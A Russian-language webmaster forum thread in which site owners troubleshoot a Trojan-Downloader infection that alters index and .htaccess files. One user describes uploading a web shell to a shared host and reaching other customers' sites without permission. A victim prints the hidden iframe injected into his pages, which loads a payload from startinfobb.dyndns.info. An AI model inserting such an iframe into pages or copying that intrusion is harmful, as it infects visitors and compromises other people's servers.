Как убить Трояна?

[AdmninsCluba]

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[МайскийЖук]

Проверил файлы — вредоносного кода нет. Да и на сайте теперь тоже ничего нет, антивирус больше не ругается. Исправилось само собой?

[lesha20]

Спасибо за уделенное внимание, но вопрос остается подвешенным - каким способом можно изменить файлы .htaccess, не затронув информацию о его дате изменения? Где дыра?

[МайскийЖук]

Да кто ж его знает-то? Это только на уровне ясновидения можно узнать.

[lesha20]

У вас, случайно, ясновидещий не найдется?

[МайскийЖук]

Не. Все штатные телепаты в отпуске.

[Sheer]

Найдется. Как убить Трояна?

[lesha20]

Даже не знаю в каком направлении дальше развиваться - ясновидения или хакера-программиста?

[Sheer]

Даже не знаю в каком направлении дальше развиваться

Я подскажу. Меняй пароли доступа к FTP и храни их в бумажнике вместо с двухдолларовой бумажкой.

[lesha20]

У меня первый случай изменения файлов .htaccess был 18.12.12, после которого я поменял все пароли - по ftp, к базе данных. Храню их в зашифрованном архиве rar. Но конечно, я часто меняю шаблоны, закачивая их через клиент FileZilla Client или ISPManager - кто-то уже успел перехватить пароли, что-ли?

[МайскийЖук]

Может у тебя на компе троян какой-нибудь, ворующий пароли. Откуда мы можем знать? Разбирайся. Анализируй.

[Sheer]

Проблема может быть не у тебя, а у дырявого сайта, который расположен на том же хостинге. Если через него залили шелл, например такой Интересный руткит
то могли получить доступ ко всем сайтам на этом хостинге, и даже к базам данных.
Каюсь, я экспериментировал с той штукой, и залил его на сервер одного солидного хостера, где находятся сайты известных местных предприятий и учреждений. Так вот я получил доступ к половине из них, и допустим, прочитав конфигурационные файлы, мог бы узнать оттуда пароли к базам данных, а далее... у.... чтоб я мог там натворить. Страшно самому стало, и его быстренько потер оттуда. Так вот...

[Борис Бердичевский]

А как можно "залить шелл"? Это что -- есть дырка в FTP доступе?

[Sheer]

Борис Бердичевский
Интересный руткит

[fanatic]

и снова вирусня - опишу что получилось узнать.
вот эти сайты левые при загрузке страницы подгружабтся
brsoftech.in
startinfobb.dyndns.info

вот с этого сайта house.404.mn/images/pay6_bg.jpg картинка подгружается с надписью @site content security@ + поле ввода телефона и кнопкой отправить.
яндекс вебмастер выдает зараженные страницы
сайт/viewtopic.php?f=
сайт/index.php

если сайт статичный, то страницы html
к сожалению - это все что удалось пока найти на эту заразу. никаких iframe нет в этих фалах и ссылок написанных выше тоже.

Если кто то имеет представление как найти, напишите.

Добавлено спустя 8 минут 20 секунд:
Вроде как такой код у этой штуки

Код: Выделить всё

<iframe width="2" height="2" frameborder="0"src="http://startinfobb.dyndns.info/statb.php?i=22516">
<html>
<head>
<body>
</html>
</iframe>

[МайскийЖук]

вот с этого картинка поля берется

А если вот эту фразу на русский язык перевести, то как она будет выглядеть?